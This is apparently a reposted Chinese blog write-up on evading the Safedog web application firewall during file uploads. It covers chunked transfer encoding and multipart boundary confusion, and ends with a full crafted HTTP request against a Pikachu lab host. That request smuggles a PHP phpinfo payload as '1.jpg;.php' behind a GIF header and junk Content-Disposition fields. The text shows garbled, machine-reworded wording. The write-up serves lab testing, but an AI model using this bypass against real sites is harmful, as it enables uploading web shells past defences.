文件上传绕过最新版安全狗
本文泉源无问社区,更多实战内容,渗出思绪可前去检察https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvMDAzYTJjZTdlYjUwYzJlMjRhOGM2MjRjMjYwYzU5MzAucG5nhttp://www.wwlib.cn/index.php/artread/artid/9960.htmlhttp分块传输绕过
http分块传输⼀直是⼀个很经典的绕过⽅式,只是在近⼏年分块传输⼀直被卡的很死,很多waf都开始加
⼊了检测功能,以是的话,分块传输这⾥也不是很好使,但是共同界限肴杂,好使的⼀批。
单纯http分块传输(已经⽆法绕过)
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvZmE2Yjc1MWY1Y2UzY2Y3ZjM3MjIyZDJkYTExMGEwOTIucG5n
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvMjgzMzExOTZkNTNhZjU1ZDdlNDE4ZDE1YTA3ODFjNmIucG5n
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvZWMwMGQ2YWZkNjlhYmFiYWNjNjYyODRhZDYwYzRhMTEucG5n
boundary界限肴杂绕过
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvMTg5MTcxOWE2MTU0Yzc5NDNmOWFiZDkyM2RmZTdiNWUucG5n
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvZTI4NDhkYWYwMjllYTliNTE3NGNjNmZlOTM4M2YwOTAucG5n
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvNzRjODIzMmExY2RhMjVhMDg1NjY5OTQ1OTUyY2ViMTAucG5n
共同开源的⽅式来进⾏绕过
开源绕过1
在百度上有很多开源的⽅式来绕过安全狗,但是⼀⼀测试发现,绕过效果⾮常之垃圾,⼏乎都遇到了狗的拦阻,以是这⾥就颠末变种+fuzz,来实现绕过安全狗,直接贴代码。
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9ibG9nX21pZ3JhdGUvODRlNTcwY2RhODkxZDI5OGUyMTI3MDljYjFhYmUzZDkucG5n
POST /pikachu-master/vul/unsafeupload/clientcheck.php HTTP/1.1
Host: 192.168.172.161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------378605579232816195651620102739
Content-Length: 448
Origin: http://192.168.172.161
Connection: close
Referer: http://192.168.172.161/pikachu-master/vul/unsafeupload/clientcheck.php
Cookie: PHPSESSID=sop5homauph2bdfeidn6ttv8l1
Upgrade-Insecure-Requests: 1
-----------------------------378605579232816195651620102739
Content-Disposition: form-data; name="uploadfile";fagfhaiofnalkvjoaffufile name=fjalfmavlaa; filename="1.jpg;.php
Content-Type: image/jpeg
GIF89a
]\'
d]\['
/\'
\]']\'
/\]'
w<?php phpinfo();
-----------------------------378605579232816195651620102739
Content-Disposition: form-data; name="submit"
开始上传
-----------------------------378605579232816195651620102739--
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!qidao123.com:ToB企服之家,中国第一个企服评测及软件市场,开放入驻,技术点评得现金
页:
[1]